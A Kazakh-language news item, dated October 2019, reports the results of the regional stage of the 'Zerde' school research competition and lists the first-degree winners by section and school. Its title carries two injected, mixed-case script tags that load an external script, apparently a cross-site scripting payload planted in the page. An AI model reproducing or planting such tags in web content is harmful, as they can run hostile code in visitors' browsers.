«Зерде» зерттеу жұмыстары мен шығармашылық жобалар республикалық байқауының облыстық кезеңінің қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.10.2019

2019 жылдың 24-26 қазан аралығында Көкшетау қаласы, облыстық дарынды балаларға арналған №3 мамандандырылған мектеп-интернатының базасында «Зерде» зерттеу жұмыстары мен шығармашылық жобалар республикалық байқауының облыстық кезеңі өтті.

Байқаудың мақсаты – зерттеулік әдептің дағдыларын жетілдіру және зерттеулік әдістерді дамыту арқылы бастауыш және негізгі мектеп оқушылары тұлғалығының зияткерлік-шығармашылық әлеуетін дамыту, ерте мектеп жасынан оқушылар бойында зияткерлік шығармашылықты дамыту.

Байқауға 16 ауданнан, Көкшетау, Степногорск қалаларынан, №3 ДБАОММИ-дан 159 оқушы қатысты.

Жүлдегерелер жас ерекшеліктеріне сәйкес 1-4 (кіші жастағы топ) және 5-7 (ересек жастағы топ) сыныптар бойынша анықталды.

Аталмыш байқаудың қорытындысы бойынша І дәрежелі дипломмен келесі оқушылар марапатталды:

  1. «Қазақ тілі мен әдебиеті» секциясы бойынша Каримжанова Бекзат– Жақсы ауданы, Терісаққан негізгі мектебінің 7 сынып оқушысы;
  2. «Орыс тілі мен әдебиеті» секциясы бойынша Аманжол Ақмаржан мен  Бақтыбаева Мерей – Степногорск қаласы, А.Косарев атындағы №9 орта мектебінің 4 сынып оқушылары;
  3.  «Орыс тілі мен әдебиеті» секциясы бойынша Габбасов Тимур  – Целиноград ауданы, Семеновка ауылы №11 негізгі мектебінің 4 сынып оқушысы.
  4. «Орыс тілі мен әдебиеті» секциясы бойынша Душкина Виктория - Бурабай ауданы, Досов атындағы орта мектебінің 7 сынып оқушысы;
  5. «Орыс тілі мен әдебиеті» секциясы бойынша Амет Асанжан – Көкшетау қаласы, гуманитарлық-техникалық лицейінің 7 сынып оқушысы;
  6.  «Физика, техника» секциясы бойынша Коротченко Диана – Бурабай ауданы, Щучье қаласы №2 орта мектебінің 4 сынып оқушысы;
  7.  «Физика, техника» секциясы бойынша Нұрмахамбет Нұрасыл – Бурабай ауданы, Щучье қаласы №7 мектеп-лицейінің  5 сынып оқушысы;
  8.  «Медицина, психология» секциясы бойынша Қанат Әділхан – Көкшетау қаласы  ІТ мектеп-лицейінің 2 сынып оқушысы;
  9.  «Медицина, психология» секциясы бойынша Сираш Мадина – Целиноград ауданы, Софиевка ауылы №21 орта мектебінің 5 сынып оқушысы;
  10. «Химия, биология» секциясы бойынша Морозов Никита – Жақсы ауданы, Қима орта мектебінің 4 сынып оқушысы;
  11.  «Химия, биология» секциясы бойынша Сулейменова Айина– Көкшетау қаласы  ІТ мектеп-лицейінің 5 сынып оқушысы;
  12. «Математика, информатика» секциясы бойынша Мырзатхан Бекарыс – Біржан сал ауданы, Донской орта мектебінің 2 сынып оқушысы;
  13.  «Математика, информатика» секциясы бойынша Галым Мади  – Жарқайың ауданы, Н.Крупская атындағы орта мектебінің 5 сынып оқушысы;
  14.  «Экология, валеология» секциясы бойынша Талғатова Сұлу – Аршалы ауданы, Волгодон орта мектебінің 3 сынып оқушысы;
  15.  «Экология, валеология» секциясы Тлеулин Нуртас – Көкшетау қаласы, дарынды балаларға арналған №3 мамандандырылған мектеп-интернатының 7 сынып оқушысы;
  16.  «Тарих, өлкетану, этномәдениеттану» секциясы бойынша Оразалин Жан – Көкшетау қаласы №1 орта мектеп-гимназиясының 4 сынып оқушысы;
  17.  «Тарих, өлкетану, этномәдениеттану» секциясы бойынша Бурцич Дмитрий – Степногорск қаласы, Заводской кенті орта мектебінің 5 сынып оқушысы.

Облыстық кезеңнен І орынға ие болған қатысушылар республикалық байқаудың қорытынды кезеңіне жолдама алады.

Просмотров: 577


Пікір қосу



Деректерді қолтаңбаға қосу